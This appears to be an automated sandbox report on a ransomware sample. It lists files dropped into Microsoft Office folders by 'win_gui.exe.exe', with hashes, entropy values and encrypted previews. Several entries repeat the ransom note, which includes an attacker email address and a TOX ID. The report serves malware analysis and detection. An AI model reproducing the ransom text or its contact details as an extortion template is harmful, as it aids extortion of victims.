                                SSDEEP:6144:UIlV/eXjPPREuCnQIVmI8i4lOHIMfo1DQB2jo7TyCnIYEcFJGBgWxY:UIlhWjBEuAQIII8xkQ10mgTqYEcFJGP6
                                MD5:347EB0D21679FA0359E01CF62F2D0AA2
                                SHA1:A48234F9ED7D030C3FD25777457BE87D30868C82
                                SHA-256:6A0D5A169D5D625257D2B733853CBC7203C919DE46366687E358CE916611846B
                                SHA-512:1C882EAAD747B41D3E512907F1F7F59B63AA5C4EB4FB176CF3C881580285593E69D071520AA802E66CABD7FB02331B9B12F17E6AFA1F89223CD70F1C9E0AACDE
                                Malicious:true
                                Preview:.II.[.f~..8...k.;...f.Q..@.....5.34 .)....$2...gh...f...).CE..h.F...0Vf.~B8..{.....v.rQu.e.$.t.Yo#..o....R\.QU....SZ$C...9>|.78.../....\w.a...c.6&.........}.x..U.....O.mb.mK'.Yr...@.5.K9..s.*q.'l..:.1.B.C.$.0.:..'.g...I.l7P....=......X..3a..Ri)c..p..:...]...A=./,G..~..l.MpTfe...$.O./....WR=Ga..A..x.^cm:....4....]H.L.V.r 3P...].xfR..5.....,x....U..pLt...%.Ik....1.......-SdJ2.7.......R.rl...D.;...2...o}...d.h..@..6.......~DUa.{...N1.......g.BS...Oti.....0..6uY_*}99._<..w-$..~.su'T.!....c-@..Yu..w.tK...._.d.3....m..71T.:3B;%B>..H..7.....@........$.7'.-V.$.o.$.q..#..*.\.....J..Z.P.y{...S.F..!C...%T.8;gW....<...I.5;..P...s.4.M.sI.}......9$#~.(../..9..0..Ch9|0..b<.9..&..C..U.%....FO..O.. q....x.k..YN....C<..'Z...I....A..:#..*V......s.3.~.s......J....6...$....^.s........l.n...*oB%\.6Sv..f....aW.X.......W....=(..n......}...e...1..t?....... DP....S.}..FD........SH..4f>.......~HJ6z.}..X.?..A.-..<.V#(.n..d.Q....+..)U...(.[... ..s..c...b...C...K.

                                C:\Program Files (x86)\Microsoft Office\root\Document Themes 16\Office Theme.thmx

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):307491
                                Entropy (8bit):7.999459976821999
                                Encrypted:true
                                SSDEEP:6144:hBp/fdX2jB59w/KZ+9+TMx/Mtu0JcBj0+eWVc3+WOyD+6IkWDKgdhf9agd2jUBwZ:hHdGjBCKo4M1hqCzDcuWI/rfyPEVy
                                MD5:9271A4B0D915B9484E20C29C6B3D8810
                                SHA1:D4B1EE953A292F6D5CECB7110A675BDF9517F7D8
                                SHA-256:C7A4AEE627F2B55D685CD9C9D52FFDF9B0401FFC85EA8BCAE292AF3D4681E60F
                                SHA-512:11873BE6009F6736841AE8EB3E84D77082588431083AFAAC0AB1B31017E11C34C1B1264A91B9902D0681013565BD647FFAFE8CB95299047D8D74C5FB6514E2B9
                                Malicious:true
                                Preview:);:u.gC.....$..HG....(%_.-....._.<...FU.(.1;q..-./....A.e.U.(......._..]....8v...I.K9..?.%R...(...p.7....d.<.2...<......<.`W..VQ.c.].p..<..[.....U..K...X.E....O...[*h.6..5T.R..P/.^b.{...Rk.EA.=....".D..j.|%...%G.z$]SUS....`.....E.4$'....t.rP...nJ&S'....3G!f.....9..YE;.d.z8ohe'.a..|.l.t...{......C....G....Z.#.].'w....y-s....E|.a...@b..8.@.0.....0.._.=.E.0H%....W)!..vE..3[=.i.....8...*...di..'*.Cf.?..!.........K..m....e..G.#j...%...&....oU..H.?VU.....N......U.^.|3_..-..0.._+s.Ze)...WS.&..$I.0.MpVP.:..p....35'D|...Z.e.g$-7..l..v.p@e.\<..8...}`Z.......`~...o#.'P05..a..y+h.M;.)....&)._L.....Jn....*.qe.U[ .n.."..[.......(X.j7Ls.....rzu.......N.....S.(I%3...H...>VKg........|k.U..!.4q.!T.+.w.6\vg...f.TsiIPi1..6&@R....e_...NmZ..f.......SM.u.R>.kV.w.....%"..zn.G..I.g.2.......:..0.r......(.R.M..#.B.5R........^..*.......'..._.....\d.....|-.<..]=..._.9sB......;......p.2.......n.....;.......B.8...... -TV1..qF7..9..R.v`1. ..vV..@...}J{..H..m8....

                                C:\Program Files (x86)\Microsoft Office\root\Document Themes 16\Organic.thmx

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):8706177
                                Entropy (8bit):7.975157344042223
                                Encrypted:false
                                SSDEEP:196608:yjK7YlmZcPZClC6QAZ2sjCvWJo2sKLCIV5JAmadFS/Zurw:KHlVUPQAriWJo2Lrsrw
                                MD5:D0B4E6FCA8933A3D4FBDA695461F280B
                                SHA1:850F0A2D1FBDD070E44755114A7CC81CDA88ABA1
                                SHA-256:944CE6CBC6A65F956A2BC2CFB2641E6396B8FA00C82A8564AA64602F8C881597
                                SHA-512:17C27EFC438DD94653CADAF4D4F1746B3D668AD0099680B1DF0282B09806459C1AFE94A38D815C49508CE0494175528862C410FAA1A8A85AA5791FC8DE299BFE
                                Malicious:false
                                Preview:d...M.........?!KP0........ B.v.?...L.^.F...L....&.........5g......aR;...g{.......6}d.P.<....6....3....R..1....?.]~.8.].....h.7$].......z..n.}(....N..H.7.&a..U..K....%#l/L..x....cT3..1..q?....:.=IZ..$.#..<..X*..<].2.!.3H...D...U.......)s.W..;..P./'.;a.R.^..;.Dv.2.....qi..L}......{.1....,..V =y...;$...w,'y.v).......v4s.t*.Q..|Y.......!.;.@.'..~.1..L.0..4..gZJ.9..=w....Z...l.;...-.?.....Ni.._.E.....~...A..c.............^.^.w...H'..D...b.....U&........!&......7.._...b..:F....m.s .........{.9.>..UO.J\s...r:.[;...J..r..#.cH.;v.:..E....}...\hy..[.1Q...g....UE...........z.5....g.>jD.t......m..[1.Xq..II..t.3.,..A.b.JL..T(.] D........d../...... .:....K....d[.^...@+.@1...R.b..E.M...Z........0.:...^...<.).....h...R 3..4..d.(i.G/.N.2...<-.J..[U.....NW.uV._+.z...Z..~.Xe..s[......,.=.<..@..V..#c.B......A_..nH{j..@&....v.'.m.b.....1a*...uR#...R.1..Y._.n..qAP....g:......D..)....k....z.5.....?.u..;..H7.`3..TmS....D...b....d..8O.G...#..)>.v.:.....>.

                                C:\Program Files (x86)\Microsoft Office\root\Document Themes 16\Retrospect.thmx

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1623868
                                Entropy (8bit):7.92955460291453
                                Encrypted:false
                                SSDEEP:49152:dqah71PI+6fB3Abk+iQHZtHmV4RfiMNccSvIr/nSh:sag+6pQbk+iEZtGV4lVWcSvIr/n6
                                MD5:5315ECE7C5085A4DE23459C4BA257031
                                SHA1:C23F6401E36FDEDA4A4AD6678F6CA511429983CB
                                SHA-256:A9E293592475C613E890A9F5576D01C00CBA05BFB2F5E7A85515666EB9E78FE9
                                SHA-512:7729DCE777763A86BD172D7B8979DFD3D640BDF3A246A6387372C699C17AC6D489C5C5DE38BB1FD0CA8FBA86C24AC812DAA672BE68A503AC5737B9101A4886D4
                                Malicious:false
                                Preview:!.-|.<._......f>..L...H.8.cQr...%.E........./S..#{...v.6.N.~.W:yj.....N.....6.A.82...o.A+[g.Ru.+....C.CT..b_C,X./.-..z@1.h..J.{2N.F.....QB..........,*6....W.5...0{N......&...x..zN......\..x....3.....7.Gu.*..L....5Th9'|..#.@.l1..L.5%|..kA.....X+...#5JE+..A.....'....q.R...)6....v...1.z]6.r.WO....z.>.@Ld[.q.J8..gC.....5q.(].w.].......-zXdS.6........t...\.A..@n().....z/T(}.k..Fs...r.>...7.NP.v.IP.......5je.5Pc.Y.WK.....M.L...P..`C.>L.3.s..e......<.x..&2{%..(f>....oLs..'1.......W.r,(..#8.. .~.."~....5.-.]..f6pg.K...S.j2...4....>I+..k{...\g.W[_~.w....2l..`1E.........,....}....t..-ob.&...,x..6..h...@)B..EE#S.Hm/...@.l.;.`H.....J...\..._@..lT.J...iEg!.a...9.3o..a.\..U:....L....x.*...s...2.i.T-.--......F=.2h.....:){.V<..........P%.[......W...q..#.t?#.7.{t.K%.3R.+v...Y...MX6.M..}..q.Aom....h...e....y'.n.C...<...~..H..-v.......b.".~...+.e>.4..n....O7.7wV.....`euD...,..!..f/b.?.z.E"7...w..Sq.g.*..{,..w..+Z..8....q".2..'...7.d.DFLo..Gs.r......B.6e..F....u.....

                                C:\Program Files (x86)\Microsoft Office\root\Document Themes 16\Slice.thmx

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):865418
                                Entropy (8bit):7.941334721124736
                                Encrypted:false
                                SSDEEP:12288:3oUUO6zqjl6HXIgRoy0Lop1uns8fj7dfFfqVTeNf+pJIZDOZm002sPzPEpX0+s0R:zy35VooKsEfBaeVMJLZm0kajwuQfUX
                                MD5:2DA2F5EED127B1A3E0EC6E564BEA2CC4
                                SHA1:D4429D97CB337948DABF08B4F2D93E5781F89C64
                                SHA-256:F1B39F5E19D85EB736666741DB3C0D5B19BDEFE93D6E087425F7BA3DA10D7DDD
                                SHA-512:FFA40058B13F6B457F412637CBEA270CFA31F20102327E02A214956ACDA816876C485002F40758ABAFDC68FD65B09905A2DF846BD66B87ABE4B64B05C5995408
                                Malicious:false
                                Preview:8.[..Z.. ;..`..'.-....Ti......B,.C.d5.`....1....j....S@.^M...hUF...9....zs....x.C...68B*....+....ee...S..<.Q....+..-....M.?N.~b"...C.x...x..v.0b~...%.jG.p........j\}s..|.E....(&.hA.^..Y .9lE..~p^,..w.l./i...A.+...)r.5T..|..P.I..&...+.X..T,......_.K%..7.L.ZQr.....2<>..{..z~.d..>.).M.....%...L....b.co.........F.!. ...7R..k./....o6...^.b.fDU...^,+gc).V&..!...F.L..#.4.{..*...... ..[.n...n6...7NF...(..#U.zm.b..P.I..aR.+.7...@$.....b.`...q)..d...Ro..Q)...BT.....,p.....r....X.;...........aG+..t..Lg.].G}./....Q6..6.8.*......M..@..|.}?..g.[i.=....r..a...w$..e...*.{2P.`-w.z..v..`.9+.^g,m......V..u.!_.^aQ9'....C.T...aw..q.....z...,...x.Y. .......9...../.. ..FW_.Z ...W..7..~......O......u....ILLW.4.........xT.d$........r..Z...#......-.ST.|>..ez8tz...g..sD..V8?.9.....K..i...2...\.....,O..^i...._-[...L.'.iP...BT.n....y..s.h...5.q..!.eG.......>...`.x....S..p.a-^.n..z.&.q...4!._...5E..S.>F{.8.sO.c..0..... ..Q6.K+...{.*./W....8z.H.O.....7..<.q..S.p...6.....D

                                C:\Program Files (x86)\Microsoft Office\root\Document Themes 16\Theme Colors\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\Document Themes 16\Theme Effects\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\Document Themes 16\Theme Fonts\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\Document Themes 16\Wisp.thmx

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):772641
                                Entropy (8bit):7.9542632556813
                                Encrypted:false
                                SSDEEP:12288:ICcEvhvQMuHM2MOQj7NA7JW3YYNLHFvHxozHUt3Uz7R6Z+ptghUGJDTQMUryRmJa:IVEvhoDi7NAANLlvHxoz0t/ZdxwJZ9De
                                MD5:2E911ECE0CB38FC52F5D674A5F96DB74
                                SHA1:A1B6E28E2EE82A6DC9A20B5187E3BAAC18018E12
                                SHA-256:FF162F1F020624B2F6617FFD7573A3B64CE9FE451ED33F4035E7D453C3A4D5DC
                                SHA-512:7F785A50255B4BEC10C9D9448D4117148426509E813603403598B347159DB6EB5C28E4445010F5464CACA910E09607558948C0F7F67C52794BA2BB508CD69E06
                                Malicious:false
                                Preview:.K...H.7y..<....wV......d..."..c.Lx.dL......N?..".....,}#T.i.b...@......]H.("nB..`.q...e..,.Y.s.@y..Qz...b..`Xx...Q.5U.7.........4.......3[).W..g......%b.-..3.........Z.x...T..~...G...P..0+.......<..PTN.f..e......Lb..&.~.6r.i-r...m....t\Z.%...q.u..u..f>.W |tx..`Ka$3.....w..8$..;...Gs.W....OG^..!.o...2.S.....r.}[Y_..@..$.2..*.2.ai......(......,...nk.O......7....g.9.q..aF.j...nu.b...hJ.+'....X........WJ7B.3...]..,.........PTlk.&C.aX..........^.j.r..b.,..c......i..xi.i...j3....NcP'a.:.....[........x.....3.:i...l(;..c...:.+v.E..9b...#.....N..!r...F3..4.K..Nh.`U..q..(.).......|....i._....M...c..5............3/W..X.....J....E..i.1.G......:....op.t....${."...j.-.'...`........'2.)h....U.)"...U....Z...6r1...c..,.x.......T&..r~.8r/=..........^........#.^*. R..G P5s.S.yD..t..kEO..Z.[F.D...a..].....Hk.....G...EU.F.teA.5.S~.<D..Ot...!M...9.?P..G....c...@.t..Z..]p. .B..K.0.uE.&..6.~}...#s.(.fg.`.@.8.-~n..Z....R._^............P.c..bsNr.....%9.

                                C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files (x86)\Microsoft Office\root\Integration\C2RManifest.Access.Access.x-none.msi.16.x-none.xml

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):68348
                                Entropy (8bit):7.997326446559704
                                Encrypted:true
                                SSDEEP:1536:0VfAk/nKkrvuGVpmGUvwWiie/AxOksjmb1ZvnxsXHT3uCTHykX5:cFKkDvVIPCAx3bhZ/+Xz+cJ
                                MD5:05D51CBBE2B41ABE9D0BD26A936A36FE
                                SHA1:2AFAD2B24F173C5E105E3D9301AA57D9184921D5
                                SHA-256:DECC15C02058939A1E7F71BE31303A6DA255F9A7242764F38AA05421983B869B
                                SHA-512:448FC1950DDC24BE333FE5ABF9464BF1E18948F7090FF99255AD78F8C466E113B0D5F15C0DDDBB92D355828AB8862C5A5F792D87BD77763C7685F10449D781A4
                                Malicious:true
                                Preview:....O(...l\5.7t......!w.'.x...q...-.g.7-..-.....J...Ly&...T2/.m...nN.A`"..)\.Ki.8.y....v.I.UM:......er/.;.....G... ....)....)k.e:o......h3m.V.Y..Ve7D..B.(....Rp.v.....?R.i....%..]..j..E.d....y...G..#Q..y`.c.;...P.+.7... .vc...x.K.b.N.q7E...I....9#.6D.X...^.|8@Y.i 2....~..DJ_...'.p.H...O....<.U.lJx.X}...y.d....G.6%....V.-6XSn7.26.8......]u....+...,.5V.2..Y.:......"...l.......bj.j....F..Mj...A..+X.\...I.8tX..?{.X@..T...32bm5..8p.=|..R... .=z.%.'.;[c.(.DiI.Qa..q#F..H.f.V$.Bejh5....$L..$Fo.....%$k../.uV1..p....xpXm...~2...z!,..}2..z.`9.l......Bis.../...Rc.....fr]...=b.P.7i7...7.bS\.n]v...e.B"..g......6.H<...6..e...`...GZ..X.%........c..7.b..J.#.w...Wws......c}Rb....J&!....J.n...LQ[9.}.8km.e...!.J.*...u.....H."b'N:...o.(3..:..k...aR..6../&M.n......{x..X.)..'}.5'+&..S.\.J...@..Z..(..\T......tY2W....s1.............\..7"+.xS.].K."...dm.Ev7yE.x. ..+..O./....J;.c..G.*.EAY...*O|.....d..|....|.1.w.._..+.Y..)..._.)..?+.ln....,....05..o.D0.._Eq.....[

                                C:\Program Files (x86)\Microsoft Office\root\Integration\C2RManifest.DCF.DCF.x-none.msi.16.x-none.xml

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):17556
                                Entropy (8bit):7.988576764272021
                                Encrypted:false
                                SSDEEP:384:JoETATe6bQia+0yu/dsEc883+rnYYXW5pqxrgm57L9Y2fDJQW3+VOdW:eE0CBia+0yBEc8nYYXYp3m19Y2fDJQWs
                                MD5:1F70ED38D5468CC2F8327CA7A171251A
                                SHA1:F84A869E5C2684EC33EC3DFEA5746BB1C63F8FFC
                                SHA-256:349470F01A27A1FD3E29ADB7A86695C12C13FF4640A732592CFD869CAD0FFB13
                                SHA-512:4BCF6F5A0477AE05E9548B55D649716FCF4E25D163842DA04045E50A88BE3B3F1D8D0CCC2456BEC32DD52538C0944A84B3B5D4EBF29069A65228894B9B2C21A3
                                Malicious:false
                                Preview:.H.....V4..j.T..f...o...=..#.v%g.L/.=......m..i.H......R;..j}..fL..')W.|.,......a?......f..o....#a|9...<.%...J.>.$.I|l...d.u..>j....#0z.....rC=...P.I....q._...D.....vm...G....Y.....b...O&..8ot/....:.nv......k......o+.....j..!...|!m.61..|)..~f........p..U...........B.&j....,..g...6JZ..D..z.%5A,j7{.g7.7...I..C{.....0..<b.K.p}....pAGfn.V..W.U.8....3.....D.......>....=b...Z=R..T..3...OHjIt...0.L..&.{.C.ae.......8..L...<*8....%...\aR.X.........h//N..'.]....ON0d..N.x...|D+....|D.`.....4p..%.e......p....i...x.$7OB.d+}...*UX.U.g.....NhF...-..a.3My..Mw.G9.....LJ.|..v.0..,....[,9n....i.]..A1I;_Z~...glM.'......P..)..w...8..Wl..bfg#{...f.s.!...U\.v2.PY9E...8...u..".._..J(.{;[.^..%7......jB.`....|Lv&.v..s..X.(.8...$.....-~....>..Z.....q.N...,G*Z.V.N...$cd.+.B.x.:#A.{.....?.SJV....u.!Djt...}..fn.<.\.-J.NZ..v....y.q.B.g.Bo6.;..q.W.....<...lmV.!..m.7."[..6...........!...~. .K.i...3...zjQ./.*..M..C..8I..0.|./j..7.:.CK>..-..... +......C$.5..Ke.U~..

                                C:\Program Files (x86)\Microsoft Office\root\Integration\C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):174296
                                Entropy (8bit):7.998846328690469
                                Encrypted:true
                                SSDEEP:3072:p0i/znyZxuUDXVCCbFO8hwM2pEoLIfydqn3duEAp3SmV3jsj3hhBX:xLyDudCbFOOwM0EKkyFEAp3JV3jsbhhl
                                MD5:F9D8E290904397A6590A7BF305B94E88
                                SHA1:F43CDDE51AB71D77FCB5C7C57A4118B91055E4DC
                                SHA-256:0A6D5E38EB15FC397E108E75A9BDF3A22DB872E51DF8079BD9D57A377AFCBEAF
                                SHA-512:994CAD0BAE2ABB90135A5A2BD1D1181C8E8FBC691D7D4504AD3919E32A092424723B0F363C017BD566A15F10C58023173463544235278022738C7D55D4197058
                                Malicious:true
                                Preview:k.v.RO..f.<b._[...@.'!....n..fy....C....j..8..7?(...Z..u...'...?'JN.H.Ex.L....H...%*:v8.......b.R...E.351.....(..^...`.w...{Qg#-..Q+@#..:h....|.{.x.....K.N._.<mv^.t.XI.iF.G.Rh.....{yf..Oap..q....J.o.g.!Z...P6_D.Y.3...9..z...8....M..1U4..._......g....a.....skg..ww...A.U%. ..Amz..q....H.tM..UU..,.(./..y...u.?..U.%c.Y..........18..f...$ ._...o@vCx.O.pL..V.."....c...J..5..a.`..`t?.1...6\......xzB.u3?2..\:..'.!....LL...q.#n`...nC.....=..i..*%7...O..]..s..<;_.q%W2...f...j{J..#).5..o.....N..#.u...Mw...........3.2..7p..qH.... *&D......1.?x....%....Gh.w.F......[oc..s.......1M.(...5:..'[@...U.....8.....t...Im.,....B...z..^(.t...bb.xC.....,......AN..DY...s.1..'.?.. ...-a]a..F.f..."0Hw........1..s..M..K.n........O.r.s.....ge[..E..nY!...Ax...oq+$....O..-.x.r...k_d.."z.Y..:`.*]H-bW".b.4<Q.1.Q...-......8.:y.Z...?(:16.cK.....d.%Um....l.d..0...Y.`....%..$..q;_......\"..Q..j9..I.-._.A..!.x.\Z.nU.....A.Vz.q...m.8.*.u..fPH.w.5f"3e.......N%].....2..0N....,....,+..

                                C:\Program Files (x86)\Microsoft Office\root\Integration\C2RManifest.Lync.Lync.x-none.msi.16.x-none.xml

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):95054
                                Entropy (8bit):7.998035396213496
                                Encrypted:true
                                SSDEEP:1536:7m6Y0vdJWyhFOZN69kYga4f1q2l64k5/djTdOwlqDyDEU+5tNc5J1NfwAEZHkl6:669J/hFOZw9kYLY1561/dTdah5kdNfd8
                                MD5:375D1D72A2004CE8015D8B65C8E330D2
                                SHA1:7F9FF264F88C55292A22D8EF3E34A1649E85336F
                                SHA-256:FCE399C7E06D771148FD43C66825C8D1E51EFAB545CA3ACF542776059CC36555
                                SHA-512:5ADD5010B77766D5A3788EE298E03CE5462F52E314B66A2155BA2C24BC589CF9AB7E65888612FD6DFB9C3121D6D15EC3741AEB836E0F416F194FC7FA684370B9
                                Malicious:true
                                Preview:.V.G.....&.]........L.G.i.x.0.@.|Uh...W...f.S._.........[.M..W..."...o.p./..T(FY..'.U8........_.q...3...1.R.<'B..Z.tee....... ....x3.a..I..#...f......:.~U{#._......#)e..@&...w.$&tJ.da&...~..[..1...G.[.....,.h."~...]..}.1].)~.r.x[gd..DR"m....mU.7....1;E6.|.[{x...x...D......G&...Os.]..O........~.F.@......^.j_.o(.!..8.H...E!......W..G3..B......uD%..N...;...-.(y.@p...]..jx..6...^.m'..7^f.....%.8]LUaK...[..wF.zE@K..%._..li}.`S...tY:D.wm....k$.WX.|.O..}.`..GC...5..w.........Q......XS.4|.c4....'Zv.d..B.8z....sOT4..8.A4...z.A`.Zu.....{.(.E.....B...P..9.Tt.(...J.uRd....X.&N.q...T?;1qb..X.'Qc.OX....e...]bQV.F..#..NG......P...c....X.........[<"..l4,....,a.....\...g.aa....K>.G.....F>}u.&...P@i..6...+#....h.x..}.V.'..c..`#5.C..?.~e&...d.i......y..Oy.K.......<l.b.+...%.......1m...<...W..;...P..U$. .<.iD......l...X.yT........MS.....2.O?..+;Wx~C.!.LNZ.2.r...)Ns..........:R3.w#........:(....7zPr4 /.jS.I{'.^g..c.9.i..#....@..gY.......'k9hM...h...$.$...d}q,....

                                C:\Program Files (x86)\Microsoft Office\root\Integration\C2RManifest.OSM.OSM.x-none.msi.16.x-none.xml

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1664
                                Entropy (8bit):7.864028799957495
                                Encrypted:false
                                SSDEEP:48:Jqr7hqR9rGgod/zoS4N7/WyYu+MAVMJg6TO:JqPMHud/0fN7evuAVOO
                                MD5:DFF54B9CDAF3B5A65465F459841F98C1
                                SHA1:64DB3E7BD7408EB5D282DCDE3330D0DF7A50F493
                                SHA-256:54E48D5067E71C2AC04777B4EFB5923B0631A1D1F233037358F65932DAA10249
                                SHA-512:8996907737534661A06FA44F3400DA9858D95A56B7D9A28D309416CBEB80D1DEB9E463C563A7488CB21DB7C5E1F8F8AC5710E87850DE8A708B700F535684BDF6
                                Malicious:false
